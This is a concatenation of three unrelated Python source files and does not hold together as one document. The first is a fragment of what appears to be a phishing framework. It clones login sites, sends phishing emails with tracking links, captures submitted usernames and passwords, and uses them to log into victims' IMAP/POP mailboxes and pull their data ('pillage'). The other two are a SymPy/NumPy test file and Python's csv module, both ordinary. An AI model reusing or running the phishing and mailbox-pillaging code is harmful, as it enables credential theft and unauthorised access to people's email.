self.display.verbose("Found POP at : %s 110" % (host))
self.server_list[110].append(host)
found = True
elif (port == 995):
self.display.verbose("Found POPS at : %s 995" % (host))
self.server_list[995].append(host)
found = True
elif (port == 143):
self.display.verbose("Found IMAP at : %s 143" % (host))
self.server_list[143].append(host)
found = True
elif (port == 993):
self.display.verbose("Found IMAPS at : %s 993" % (host))
self.server_list[993].append(host)
found = True
elif (port == 25):
self.display.verbose("Found SMTP at : %s 25" % (host))
self.server_list[25].append(host)
found = True
if (found):
self.display.log(host + "\n", filename="hosts.txt")
#----------------------------
# Profile Web Sites
#----------------------------
def profile_site(self):
# are required flags set?
if (self.config["profile_domain"] == True):
self.display.output("Determining if any of the identified hosts have web servers.")
# for hosts in the port 80 list
for host in self.server_list[80]:
# create a profiler object
p = profiler()
# run it against the website
profile_results = p.run("http://" + host, debug=False)
# if we got valid results, look to see if we have a match for one of the templates
if (profile_results and (len(profile_results) > 0)):
max_key = ""
max_value = 0
for key, value in profile_results:
if (value.getscore() > max_value):
max_key = key
max_value = value.getscore()
if (max_value > 0):
self.display.verbose("POSSIBLE MATCH FOR [http://%s] => [%s]" % (host, max_key))
self.profile_valid_web_templates.append(max_key)
else:
# other wise we will see about adding it to a list of sites to clone
if (p.hasLogin("http://" + host)):
self.profile_dynamic_web_templates.append("http://" + host)
# repeat same as for port 80
for host in self.server_list[443]:
p = profiler()
profile_results = p.run("https://" + host, debug=False)
if (profile_results and (len(profile_results) > 0)):
max_key = ""
max_value = 0
for key, value in profile_results:
if (value.getscore() > max_value):
max_key = key
max_value = value.getscore()
if (max_value > 0):
self.display.verbose("POSSIBLE MATCH FOR [https://%s] => [%s]" % (host, max_key))
self.profile_valid_web_templates.append(max_key)
else:
if (p.hasLogin("https://" + host)):
self.display.verbose("POSSIBLE DYNAMIC TEMPLATE SITE [https://%s]" % (host))
self.profile_dynamic_web_templates.append("https://" + host)
# sort/unique list of valid templates
self.profile_valid_web_templates = Utils.unique_list(self.profile_valid_web_templates)
self.profile_valid_web_templates.sort()
# print list of valid templatess
self.display.verbose("Collected [%s] valid web templates" % (len(self.profile_valid_web_templates)))
self.display.print_list("VALID TEMPLATE LIST",self.profile_valid_web_templates)
# sort/unique list of dynamic templates
self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates.sort()
# print list of valid templatess
self.display.verbose("Collected [%s] dynamic web templates" % (len(self.profile_dynamic_web_templates)))
self.display.print_list("DYNAMIC TEMPLATE LIST",self.profile_dynamic_web_templates)
# sort/unique hostname list
self.profile_dynamic_web_templates = Utils.lowercase_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates.sort()
# for any dynamic sites, try to clone them
self.display.output("Cloning any DYNAMIC sites")
for template in self.profile_dynamic_web_templates:
sc = SiteCloner(clone_dir=self.outdir+"web_clones/")
tdir = sc.cloneUrl(template)
self.display.verbose("Cloning [%s] to [%s]" % (template, tdir))
self.db.addWebTemplate(ttype="dynamic", src_url=template, tdir=tdir)
# loop over all built in templates
for f in os.listdir(self.config["web_template_path"]):
template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
for line in open(template_file).readlines():
for tem in self.profile_valid_web_templates:
if re.match("^VHOST=\s*"+tem+"\s*$", line, re.IGNORECASE):
self.db.addWebTemplate(ttype="static", src_url="", tdir=os.path.join(self.config["web_template_path"], f))
break
#----------------------------
# Select Web Templates
#----------------------------
def select_web_templates(self):
templates = []
# get lists of current templates
db_static_templates = self.db.getWebTemplates(ttype="static")
db_dynamic_templates = self.db.getWebTemplates(ttype="dynamic")
# check to see if we have templates
if (db_static_templates or db_dynamic_templates):
for template in db_static_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", parts[0], parts[1]))
for template in db_dynamic_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("dynamic", parts[0], parts[1]))
else:
# assume we do not have any valid templates
# load all standard templates
for f in os.listdir(self.config["web_template_path"]):
template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", os.path.join(self.config["web_template_path"], f), ""))
print "FIXED = [%s]" % (os.path.join(self.config["web_template_path"], f))
# if "always yes" is enabled then just use all templates
if (not self.config["always_yes"]):
items = self.display.selectlist("Please select (comma seperated) the item(s) you wish to use. : ", templates)
templates_temp = []
self.db.clearWebTemplates()
for item in items:
print templates[int(item)-1]
templates_temp.append(templates[int(item)-1])
self.db.addWebTemplate(ttype=templates[int(item)-1][0], src_url=templates[int(item)-1][2], tdir=templates[int(item)-1][1])
templates = templates_temp
# print list of enabled templates
self.display.print_list("TEMPLATE LIST", templates)
#----------------------------
# Load web sites
#----------------------------
def load_websites(self):
# a required flags set?
if self.config["enable_web"] == True:
self.select_web_templates()
print
self.display.output("Starting phishing webserver")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
path = os.path.dirname(os.path.realpath(__file__))
# Start process
cmd = [path + "/../web.py", Utils.compressDict(self.config)]
self.webserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
# monitor output to gather website information
while True:
line = self.webserver.stdout.readline()
line = line.strip()
if line == 'Websites loaded and launched.':
break
if line != '':
self.display.verbose(line)
match=re.search("Started website", line)
VHOST = ""
PORT = ""
if match:
parts=line.split("[")
VHOST=parts[1].split("]")
VHOST=VHOST[0].strip()
PORT=parts[2].split("]")
PORT=PORT[0].strip()
PORT=PORT[7:]
# keep the URL clean
# if port is 80, then it does not need to be included in the URL
if (PORT[-3:] == ":80"):
PORT = PORT[:-3]
self.config[VHOST + "_port"] = PORT
self.config[VHOST + "_vhost"] = VHOST
Utils.screenCaptureWebSite("http://" + PORT,
self.outdir + "screenshots/" + PORT + "_" + VHOST + ".png")
Utils.screenCaptureWebSite("http://" + VHOST + "." + self.config["phishing_domain"],
self.outdir + "screenshots/" + VHOST + "." + self.config["phishing_domain"] + ".png")
# Write PID file
pidfilename = os.path.join(self.pid_path, "spfwebsrv.pid")
pidfile = open(pidfilename, 'w')
pidfile.write(str(self.webserver.pid))
pidfile.close()
self.webserverpid = self.webserver.pid
self.display.verbose("Started WebServer with pid = [%s]" % self.webserver.pid)
#----------------------------
# Build array of email templates
#----------------------------
def load_email_templates(self):
# do we even have targets?
if (((self.email_list is not None)
and (self.email_list))
and ((self.config["enable_email_sending"] == True)
or (self.config["simulate_email_sending"] == True))):
print
self.display.verbose("Locating phishing email templates")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# loop over each email template
for f in os.listdir("templates/email/"):
template_file = os.path.join("templates/email/", f)
self.display.debug("Found the following email template: [%s]" % template_file)
if ((Utils.is_readable(template_file)) and (os.path.isfile(template_file))):
# read in the template SUBJECT, TYPE, and BODY
TYPE = ""
SUBJECT = ""
BODY = ""
with open (template_file, "r") as myfile:
for line in myfile.readlines():
match=re.search("TYPE=", line)
if match:
TYPE=line.replace('"', "")
TYPE=TYPE.split("=")
TYPE=TYPE[1].lower().strip()
match2=re.search("SUBJECT=", line)
if match2:
SUBJECT=line.replace('"', "")
SUBJECT=SUBJECT.split("=")
SUBJECT=SUBJECT[1].strip()
match3=re.search("BODY=", line)
if match3:
BODY=line.replace('"', "")
BODY=BODY.replace(r'\n', "\n")
BODY=BODY.split("=")
BODY=BODY[1].strip()
self.email_templates[TYPE].append(EmailTemplate(TYPE, SUBJECT, BODY))
#----------------------------
# Generate/Send phishing emails
#----------------------------
def send_emails(self):
# are required flags set?
if ((self.config["enable_email_sending"] == True) or (self.config["simulate_email_sending"] == True)):
if ((self.config["determine_smtp"] == "1") and (self.config["use_specific_smtp"] == "1")):
self.display.error("ONLY 1 of DETERMINE_SMTP or USE_SPECIFIC_SMTP can be enabled at a time.")
else:
print
self.display.output("Sending phishing emails")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
templates_logged = []
#do we have any emails top send?
if self.email_list:
temp_target_list = self.email_list
temp_delay = 1
if (self.config["email_delay"] is not None):
temp_delay = int(self.config["email_delay"])
send_count = 0
# while there are still target email address, loop
while (temp_target_list and (send_count < (int(self.config["emails_max"])))):
# inc number of emails we have attempted to send
send_count = send_count + 1
# delay requested amount of time between sending emails
time.sleep(temp_delay)
# for each type of email (citrix, owa, office365, ...)
for key in self.email_templates:
# double check
if temp_target_list:
# for each email template of the given type
for template in self.email_templates[key]:
# double check
if temp_target_list:
# grab a new target email address
target = temp_target_list.pop(0)
self.display.verbose("Sending Email to [%s]" % target)
#FROM = "support@" + self.config["phishing_domain"]
FROM = self.config["smtp_fromaddr"]
SUBJECT = template.getSUBJECT()
BODY = template.getBODY()
# perform necessary SEARCH/REPLACE
if self.config["enable_host_based_vhosts"] == "1":
targetlink="http://" + key + "." + self.config["phishing_domain"]
if self.config["enable_user_tracking"] == "1":
targetlink += "?u=" + self.db.getUserTrackId(target)
BODY=BODY.replace(r'[[TARGET]]', targetlink)
else:
if (not key == "dynamic"):
targetlink="http://" + self.config[key+ "_port"]
if self.config["enable_user_tracking"] == "1":
targetlink += "?u=" + self.db.getUserTrackId(target)
BODY=BODY.replace(r'[[TARGET]]', targetlink)
# log
if (key not in templates_logged):
self.display.log("----------------------------------------------\n\n" +
"TO: <XXXXX>\n" +
"FROM: " + FROM + "\n" +
"SUBJECT: " + SUBJECT + "\n\n" +
BODY + "\n\n" +
"----------------------------------------------\n\n" +
"TARGETS:\n" +
"--------\n",
filename="email_template_" + key + ".txt")
templates_logged.append(key)
self.display.log(target + "\n", filename="email_template_" + key + ".txt")
# send the email
if (self.config["simulate_email_sending"] == True):
self.display.output("Would have sent an email to [%s] with subject of [%s], but this was just a test." % (target, SUBJECT))
else:
try:
if self.config["determine_smtp"] == "1":
emails.send_email_direct(target,
FROM,
self.config["smtp_displayname"],
SUBJECT,
BODY,
debug=True)
if self.config["use_specific_smtp"] == "1":
print self.config["smtp_fromaddr"]
emails.send_email_account(self.config["smtp_server"],
int(self.config["smtp_port"]),
self.config["smtp_user"],
self.config["smtp_pass"],
target,
self.config["smtp_fromaddr"],
self.config["smtp_displayname"],
SUBJECT,
BODY,
debug=True)
except:
self.display.error("Count not send email to " + target)
#----------------------------
# Monitor web sites
#----------------------------
def monitor_results(self):
# are required flags set?
if self.config["enable_web"] == True:
print
self.display.output("Monitoring phishing website activity!")
self.display.alert("(Press CTRL-C to stop collection and generate report!)")
if (self.webserver):
while True:
line = self.webserver.stdout.readline()
line = line.strip()
if (self.config["pillage_email"]):
self.pillage(line)
self.display.output(line)
#==================================================
# Secondary METHODS
#==================================================
#----------------------------
# Pillage Emails
#----------------------------
def pillage(self, line):
username = None
password = None
# parse line into username/password
usermatch = re.match(".*username=\['(.*?)'\].*", line)
if (usermatch):
username = usermatch.group(1)
passmatch = re.match(".*password=\['(.*?)'\].*", line)
if (passmatch):
password = passmatch.group(1)
# if no username or password, then return
if ((not username) or (not password)):
return
# is it a new username/password pair we have not seen before?
if (not username+":"+password in self.pillaged_users):
self.pillaged_users.append(username+":"+password)
# make a new MailPillager if one does not exist
if (not self.mp):
self.mp = MailPillager()
# attempt to determine the best Mail Server to use
if (not self.bestMailServer):
self.determineBestMailServer()
# if no Best Mail Server was identified, return
if (not self.bestMailServer):
self.display.error("No valid target IMAP/POP3 mail servers were identified.")
return
#print self.bestMailServer + ":" + str(self.bestMailServerPort)
# PILLAGE!!!
self.mp.pillage(username=username, password=password, server=self.bestMailServer,
port=self.bestMailServerPort, domain=self.config["domain_name"], outputdir=self.outdir + "pillage_data/")
#----------------------------
# See which Mail Server we should use
#
# TODO: needs to be updated!!!
#----------------------------
def determineBestMailServer(self):
if self.server_list[993]: # IMAPS
self.bestMailServerPort = 993
self.bestMailServer = self.server_list[993][0]
elif self.server_list[143]: #IMAP
self.bestMailServerPort = 143
self.bestMailServer = self.server_list[143][0]
elif self.server_list[995]: # POP3S
self.bestMailServerPort = 995
self.bestMailServer = self.server_list[995][0]
elif self.server_list[110]: # POP3
self.bestMailServerPort = 110
self.bestMailServer = self.server_list[110][0]
#==========================================================================================
#==========================================================================================
#==========================================================================================
#----------------------------
# Primary METHOD
#----------------------------
def run(self, argv):
# load config
self.parse_parameters(argv)
self.load_config()
# make directories
if not os.path.isdir(self.outdir + "reports/"):
os.makedirs(self.outdir + "reports/")
if not os.path.isdir(self.outdir + "logs/"):
os.makedirs(self.outdir + "logs/")
if not os.path.isdir(self.outdir + "screenshots/"):
os.makedirs(self.outdir + "screenshots/")
if not os.path.isdir(self.outdir + "web_clones/"):
os.makedirs(self.outdir + "web_clones/")
if not os.path.isdir(self.outdir + "pillage_data/"):
os.makedirs(self.outdir + "pillage_data/")
# dns/portscan/cloning
self.gather_dns()
self.port_scan()
self.profile_site()
# load websites
self.load_websites()
# do email stuff
self.prep_email()
self.load_email_templates()
self.send_emails()
# sit back and listen
self.monitor_results()
|
|
# This testfile tests SymPy <-> NumPy compatibility
# Don't test any SymPy features here. Just pure interaction with NumPy.
# Always write regular SymPy tests for anything, that can be tested in pure
# Python (without numpy). Here we test everything, that a user may need when
# using SymPy with NumPy
try:
from numpy import array, matrix, ndarray
import numpy
except ImportError:
#py.test will not execute any tests now
disabled = True
from sympy import (Rational, Symbol, list2numpy, sin, Real, Matrix, lambdify,
symarray, symbols)
import sympy
from sympy import mpmath
mpmath.mp.dps = 16
sin02 = mpmath.mpf("0.198669330795061215459412627")
# first, systematically check, that all operations are implemented and don't
# raise and exception
def test_systematic_basic():
def s(sympy_object, numpy_array):
x = sympy_object + numpy_array
x = numpy_array + sympy_object
x = sympy_object - numpy_array
x = numpy_array - sympy_object
x = sympy_object * numpy_array
x = numpy_array * sympy_object
x = sympy_object / numpy_array
x = numpy_array / sympy_object
x = sympy_object ** numpy_array
x = numpy_array ** sympy_object
x = Symbol("x")
y = Symbol("y")
sympy_objs = [
Rational(2),
Real("1.3"),
x,
y,
pow(x,y)*y,
5,
5.5,
]
numpy_objs = [
array([1]),
array([3, 8, -1]),
array([x, x**2, Rational(5)]),
array([x/y*sin(y), 5, Rational(5)]),
]
for x in sympy_objs:
for y in numpy_objs:
s(x,y)
# now some random tests, that test particular problems and that also
# check that the results of the operations are correct
def test_basics():
one = Rational(1)
zero = Rational(0)
x = Symbol("x")
assert array(1) == array(one)
assert array([one]) == array([one])
assert array([x]) == array([x])
assert array(x) == array(Symbol("x"))
assert array(one+x) == array(1+x)
X = array([one, zero, zero])
assert (X == array([one, zero, zero])).all()
assert (X == array([one, 0, 0])).all()
def test_arrays():
one = Rational(1)
zero = Rational(0)
X = array([one, zero, zero])
Y = one*X
X = array([Symbol("a")+Rational(1,2)])
Y = X+X
assert Y == array([1+2*Symbol("a")])
Y = Y + 1
assert Y == array([2+2*Symbol("a")])
Y = X-X
assert Y == array([0])
def test_conversion1():
x = Symbol("x")
a = list2numpy([x**2, x])
#looks like an array?
assert isinstance(a, ndarray)
assert a[0] == x**2
assert a[1] == x
assert len(a) == 2
#yes, it's the array
def test_conversion2():
x = Symbol("x")
a = 2*list2numpy([x**2, x])
b = list2numpy([2*x**2, 2*x])
assert (a == b).all()
one = Rational(1)
zero = Rational(0)
X = list2numpy([one, zero, zero])
Y = one*X
X = list2numpy([Symbol("a")+Rational(1,2)])
Y = X+X
assert Y == array([1+2*Symbol("a")])
Y = Y + 1
assert Y == array([2+2*Symbol("a")])
Y = X-X
assert Y == array([0])
def test_list2numpy():
x = Symbol("x")
assert (array([x**2, x]) == list2numpy([x**2, x])).all()
def test_Matrix1():
x = Symbol("x")
m = Matrix([[x, x**2], [5, 2/x]])
assert (array(m.subs(x, 2)) == array([[2, 4],[5, 1]])).all()
m = Matrix([[sin(x), x**2], [5, 2/x]])
assert (array(m.subs(x, 2)) == array([[sin(2), 4],[5, 1]])).all()
def test_Matrix2():
x = Symbol("x")
m = Matrix([[x, x**2], [5, 2/x]])
assert (matrix(m.subs(x, 2)) == matrix([[2, 4],[5, 1]])).all()
m = Matrix([[sin(x), x**2], [5, 2/x]])
assert (matrix(m.subs(x, 2)) == matrix([[sin(2), 4],[5, 1]])).all()
def test_Matrix3():
x = Symbol("x")
a = array([[2, 4],[5, 1]])
assert Matrix(a) == Matrix([[2, 4], [5, 1]])
assert Matrix(a) != Matrix([[2, 4], [5, 2]])
a = array([[sin(2), 4], [5, 1]])
assert Matrix(a) == Matrix([[sin(2), 4],[5, 1]])
assert Matrix(a) != Matrix([[sin(0), 4],[5, 1]])
def test_Matrix4():
x = Symbol("x")
a = matrix([[2, 4],[5, 1]])
assert Matrix(a) == Matrix([[2, 4], [5, 1]])
assert Matrix(a) != Matrix([[2, 4], [5, 2]])
a = matrix([[sin(2), 4], [5, 1]])
assert Matrix(a) == Matrix([[sin(2), 4],[5, 1]])
assert Matrix(a) != Matrix([[sin(0), 4],[5, 1]])
def test_Matrix_sum():
x, y, z = Symbol('x'), Symbol('y'), Symbol('z')
M = Matrix([[1,2,3],[x,y,x],[2*y,-50,z*x]])
m = matrix([[2,3,4],[x,5,6],[x,y,z**2]])
assert M+m == Matrix([[3,5,7],[2*x,y+5,x+6],[2*y+x,y-50,z*x+z**2]])
assert m+M == Matrix([[3,5,7],[2*x,y+5,x+6],[2*y+x,y-50,z*x+z**2]])
assert M+m == M.add(m)
def test_Matrix_mul():
x, y, z = Symbol('x'), Symbol('y'), Symbol('z')
M = Matrix([[1,2,3],[x,y,x]])
m = matrix([[2,4],[x,6],[x,z**2]])
assert M*m == Matrix([
[ 2 + 5*x, 16 + 3*z**2],
[2*x + x*y + x**2, 4*x + 6*y + x*z**2],
])
assert m*M == Matrix([
[ 2 + 4*x, 4 + 4*y, 6 + 4*x],
[ 7*x, 2*x + 6*y, 9*x],
[x + x*z**2, 2*x + y*z**2, 3*x + x*z**2],
])
a = array([2])
assert a[0] * M == 2 * M
assert M * a[0] == 2 * M
def test_Matrix_array():
class matarray(object):
def __array__(self):
from numpy import array
return array([[1,2,3],[4,5,6],[7,8,9]])
matarr = matarray()
assert Matrix(matarr) == Matrix([[1,2,3],[4,5,6],[7,8,9]])
def test_issue629():
x = Symbol("x")
assert (Rational(1,2)*array([2*x, 0]) == array([x, 0])).all()
assert (Rational(1,2)+array([2*x, 0]) == array([2*x+Rational(1,2), Rational(1,2)])).all()
assert (Real("0.5")*array([2*x, 0]) == array([Real("1.0")*x, 0])).all()
assert (Real("0.5")+array([2*x, 0]) == array([2*x+Real("0.5"), Real("0.5")])).all()
def test_lambdify():
x = Symbol("x")
f = lambdify(x, sin(x), "numpy")
prec = 1e-15
assert -prec < f(0.2) - sin02 < prec
try:
f(x) # if this succeeds, it can't be a numpy function
assert False
except AttributeError:
pass
def test_lambdify_matrix():
x = Symbol("x")
f = lambdify(x, Matrix([[x, 2*x],[1, 2]]), "numpy")
assert (f(1) == matrix([[1,2],[1,2]])).all()
def test_lambdify_matrix_multi_input():
x,y,z = symbols('x,y,z')
M=sympy.Matrix([[x**2, x*y, x*z],
[y*x, y**2, y*z],
[z*x, z*y, z**2]])
f = lambdify((x,y,z), M, "numpy")
xh,yh,zh = 1.0, 2.0, 3.0
expected = matrix([[xh**2, xh*yh, xh*zh],
[yh*xh, yh**2, yh*zh],
[zh*xh, zh*yh, zh**2]])
actual = f(xh,yh,zh)
assert numpy.allclose(actual,expected)
def test_lambdify_matrix_vec_input():
X=sympy.DeferredVector('X')
M=Matrix([[X[0]**2, X[0]*X[1], X[0]*X[2]],
[X[1]*X[0], X[1]**2, X[1]*X[2]],
[X[2]*X[0], X[2]*X[1], X[2]**2]])
f = lambdify(X, M, "numpy")
Xh = array([1.0, 2.0, 3.0])
expected = matrix([[Xh[0]**2, Xh[0]*Xh[1], Xh[0]*Xh[2]],
[Xh[1]*Xh[0], Xh[1]**2, Xh[1]*Xh[2]],
[Xh[2]*Xh[0], Xh[2]*Xh[1], Xh[2]**2]])
actual = f(Xh)
assert numpy.allclose(actual,expected)
def test_lambdify_transl():
from sympy.utilities.lambdify import NUMPY_TRANSLATIONS
for sym, mat in NUMPY_TRANSLATIONS.iteritems():
assert sym in sympy.__dict__
assert mat in numpy.__dict__
def test_symarray():
"""Test creation of numpy arrays of sympy symbols."""
import numpy as np
import numpy.testing as npt
syms = symbols('_0,_1,_2')
s1 = symarray("", 3)
s2 = symarray("", 3)
npt.assert_array_equal (s1, np.array(syms, dtype=object))
assert s1[0] is s2[0]
a = symarray('a', 3)
b = symarray('b', 3)
assert not(a[0] is b[0])
asyms = symbols('a_0,a_1,a_2')
npt.assert_array_equal (a, np.array(asyms, dtype=object))
# Multidimensional checks
a2d = symarray('a', (2,3))
assert a2d.shape == (2,3)
a00, a12 = symbols('a_0_0,a_1_2')
assert a2d[0,0] is a00
assert a2d[1,2] is a12
a3d = symarray('a', (2,3,2))
assert a3d.shape == (2,3,2)
a000, a120, a121 = symbols('a_0_0_0,a_1_2_0,a_1_2_1')
assert a3d[0,0,0] is a000
assert a3d[1,2,0] is a120
assert a3d[1,2,1] is a121
|
|
"""
csv.py - read/write/investigate CSV files
"""
import re
from _csv import Error, __version__, writer, reader, register_dialect, \
unregister_dialect, get_dialect, list_dialects, \
field_size_limit, \
QUOTE_MINIMAL, QUOTE_ALL, QUOTE_NONNUMERIC, QUOTE_NONE, \
__doc__
from _csv import Dialect as _Dialect
from io import StringIO
__all__ = [ "QUOTE_MINIMAL", "QUOTE_ALL", "QUOTE_NONNUMERIC", "QUOTE_NONE",
"Error", "Dialect", "__doc__", "excel", "excel_tab",
"field_size_limit", "reader", "writer",
"register_dialect", "get_dialect", "list_dialects", "Sniffer",
"unregister_dialect", "__version__", "DictReader", "DictWriter" ]
class Dialect:
"""Describe a CSV dialect.
This must be subclassed (see csv.excel). Valid attributes are:
delimiter, quotechar, escapechar, doublequote, skipinitialspace,
lineterminator, quoting.
"""
_name = ""
_valid = False
# placeholders
delimiter = None
quotechar = None
escapechar = None
doublequote = None
skipinitialspace = None
lineterminator = None
quoting = None
def __init__(self):
if self.__class__ != Dialect:
self._valid = True
self._validate()
def _validate(self):
try:
_Dialect(self)
except TypeError as e:
# We do this for compatibility with py2.3
raise Error(str(e))
class excel(Dialect):
"""Describe the usual properties of Excel-generated CSV files."""
delimiter = ','
quotechar = '"'
doublequote = True
skipinitialspace = False
lineterminator = '\r\n'
quoting = QUOTE_MINIMAL
register_dialect("excel", excel)
class excel_tab(excel):
"""Describe the usual properties of Excel-generated TAB-delimited files."""
delimiter = '\t'
register_dialect("excel-tab", excel_tab)
class unix_dialect(Dialect):
"""Describe the usual properties of Unix-generated CSV files."""
delimiter = ','
quotechar = '"'
doublequote = True
skipinitialspace = False
lineterminator = '\n'
quoting = QUOTE_ALL
register_dialect("unix", unix_dialect)
class DictReader:
def __init__(self, f, fieldnames=None, restkey=None, restval=None,
dialect="excel", *args, **kwds):
self._fieldnames = fieldnames # list of keys for the dict
self.restkey = restkey # key to catch long rows
self.restval = restval # default value for short rows
self.reader = reader(f, dialect, *args, **kwds)
self.dialect = dialect
self.line_num = 0
def __iter__(self):
return self
@property
def fieldnames(self):
if self._fieldnames is None:
try:
self._fieldnames = next(self.reader)
except StopIteration:
pass
self.line_num = self.reader.line_num
return self._fieldnames
@fieldnames.setter
def fieldnames(self, value):
self._fieldnames = value
def __next__(self):
if self.line_num == 0:
# Used only for its side effect.
self.fieldnames
row = next(self.reader)
self.line_num = self.reader.line_num
# unlike the basic reader, we prefer not to return blanks,
# because we will typically wind up with a dict full of None
# values
while row == []:
row = next(self.reader)
d = dict(zip(self.fieldnames, row))
lf = len(self.fieldnames)
lr = len(row)
if lf < lr:
d[self.restkey] = row[lf:]
elif lf > lr:
for key in self.fieldnames[lr:]:
d[key] = self.restval
return d
class DictWriter:
def __init__(self, f, fieldnames, restval="", extrasaction="raise",
dialect="excel", *args, **kwds):
self.fieldnames = fieldnames # list of keys for the dict
self.restval = restval # for writing short dicts
if extrasaction.lower() not in ("raise", "ignore"):
raise ValueError("extrasaction (%s) must be 'raise' or 'ignore'"
% extrasaction)
self.extrasaction = extrasaction
self.writer = writer(f, dialect, *args, **kwds)
def writeheader(self):
header = dict(zip(self.fieldnames, self.fieldnames))
self.writerow(header)
def _dict_to_list(self, rowdict):
if self.extrasaction == "raise":
wrong_fields = [k for k in rowdict if k not in self.fieldnames]
if wrong_fields:
raise ValueError("dict contains fields not in fieldnames: "
+ ", ".join(wrong_fields))
return [rowdict.get(key, self.restval) for key in self.fieldnames]
def writerow(self, rowdict):
return self.writer.writerow(self._dict_to_list(rowdict))
def writerows(self, rowdicts):
rows = []
for rowdict in rowdicts:
rows.append(self._dict_to_list(rowdict))
return self.writer.writerows(rows)
# Guard Sniffer's type checking against builds that exclude complex()
try:
complex
except NameError:
complex = float
class Sniffer:
'''
"Sniffs" the format of a CSV file (i.e. delimiter, quotechar)
Returns a Dialect object.
'''
def __init__(self):
# in case there is more than one possible delimiter
self.preferred = [',', '\t', ';', ' ', ':']
def sniff(self, sample, delimiters=None):
"""
Returns a dialect (or None) corresponding to the sample
"""
quotechar, doublequote, delimiter, skipinitialspace = \
self._guess_quote_and_delimiter(sample, delimiters)
if not delimiter:
delimiter, skipinitialspace = self._guess_delimiter(sample,
delimiters)
if not delimiter:
raise Error("Could not determine delimiter")
class dialect(Dialect):
_name = "sniffed"
lineterminator = '\r\n'
quoting = QUOTE_MINIMAL
# escapechar = ''
dialect.doublequote = doublequote
dialect.delimiter = delimiter
# _csv.reader won't accept a quotechar of ''
dialect.quotechar = quotechar or '"'
dialect.skipinitialspace = skipinitialspace
return dialect
def _guess_quote_and_delimiter(self, data, delimiters):
"""
Looks for text enclosed between two identical quotes
(the probable quotechar) which are preceded and followed
by the same character (the probable delimiter).
For example:
,'some text',
The quote with the most wins, same with the delimiter.
If there is no quotechar the delimiter can't be determined
this way.
"""
matches = []
for restr in ('(?P<delim>[^\w\n"\'])(?P<space> ?)(?P<quote>["\']).*?(?P=quote)(?P=delim)', # ,".*?",
'(?:^|\n)(?P<quote>["\']).*?(?P=quote)(?P<delim>[^\w\n"\'])(?P<space> ?)', # ".*?",
'(?P<delim>>[^\w\n"\'])(?P<space> ?)(?P<quote>["\']).*?(?P=quote)(?:$|\n)', # ,".*?"
'(?:^|\n)(?P<quote>["\']).*?(?P=quote)(?:$|\n)'): # ".*?" (no delim, no space)
regexp = re.compile(restr, re.DOTALL | re.MULTILINE)
matches = regexp.findall(data)
if matches:
break
if not matches:
# (quotechar, doublequote, delimiter, skipinitialspace)
return ('', False, None, 0)
quotes = {}
delims = {}
spaces = 0
for m in matches:
n = regexp.groupindex['quote'] - 1
key = m[n]
if key:
quotes[key] = quotes.get(key, 0) + 1
try:
n = regexp.groupindex['delim'] - 1
key = m[n]
except KeyError:
continue
if key and (delimiters is None or key in delimiters):
delims[key] = delims.get(key, 0) + 1
try:
n = regexp.groupindex['space'] - 1
except KeyError:
continue
if m[n]:
spaces += 1
quotechar = max(quotes, key=quotes.get)
if delims:
delim = max(delims, key=delims.get)
skipinitialspace = delims[delim] == spaces
if delim == '\n': # most likely a file with a single column
delim = ''
else:
# there is *no* delimiter, it's a single column of quoted data
delim = ''
skipinitialspace = 0
# if we see an extra quote between delimiters, we've got a
# double quoted format
dq_regexp = re.compile(r"((%(delim)s)|^)\W*%(quote)s[^%(delim)s\n]*%(quote)s[^%(delim)s\n]*%(quote)s\W*((%(delim)s)|$)" % \
{'delim':delim, 'quote':quotechar}, re.MULTILINE)
if dq_regexp.search(data):
doublequote = True
else:
doublequote = False
return (quotechar, doublequote, delim, skipinitialspace)
def _guess_delimiter(self, data, delimiters):
"""
The delimiter /should/ occur the same number of times on
each row. However, due to malformed data, it may not. We don't want
an all or nothing approach, so we allow for small variations in this
number.
1) build a table of the frequency of each character on every line.
2) build a table of freqencies of this frequency (meta-frequency?),
e.g. 'x occurred 5 times in 10 rows, 6 times in 1000 rows,
7 times in 2 rows'
3) use the mode of the meta-frequency to determine the /expected/
frequency for that character
4) find out how often the character actually meets that goal
5) the character that best meets its goal is the delimiter
For performance reasons, the data is evaluated in chunks, so it can
try and evaluate the smallest portion of the data possible, evaluating
additional chunks as necessary.
"""
data = list(filter(None, data.split('\n')))
ascii = [chr(c) for c in range(127)] # 7-bit ASCII
# build frequency tables
chunkLength = min(10, len(data))
iteration = 0
charFrequency = {}
modes = {}
delims = {}
start, end = 0, min(chunkLength, len(data))
while start < len(data):
iteration += 1
for line in data[start:end]:
for char in ascii:
metaFrequency = charFrequency.get(char, {})
# must count even if frequency is 0
freq = line.count(char)
# value is the mode
metaFrequency[freq] = metaFrequency.get(freq, 0) + 1
charFrequency[char] = metaFrequency
for char in charFrequency.keys():
items = list(charFrequency[char].items())
if len(items) == 1 and items[0][0] == 0:
continue
# get the mode of the frequencies
if len(items) > 1:
modes[char] = max(items, key=lambda x: x[1])
# adjust the mode - subtract the sum of all
# other frequencies
items.remove(modes[char])
modes[char] = (modes[char][0], modes[char][1]
- sum(item[1] for item in items))
else:
modes[char] = items[0]
# build a list of possible delimiters
modeList = modes.items()
total = float(chunkLength * iteration)
# (rows of consistent data) / (number of rows) = 100%
consistency = 1.0
# minimum consistency threshold
threshold = 0.9
while len(delims) == 0 and consistency >= threshold:
for k, v in modeList:
if v[0] > 0 and v[1] > 0:
if ((v[1]/total) >= consistency and
(delimiters is None or k in delimiters)):
delims[k] = v
consistency -= 0.01
if len(delims) == 1:
delim = list(delims.keys())[0]
skipinitialspace = (data[0].count(delim) ==
data[0].count("%c " % delim))
return (delim, skipinitialspace)
# analyze another chunkLength lines
start = end
end += chunkLength
if not delims:
return ('', 0)
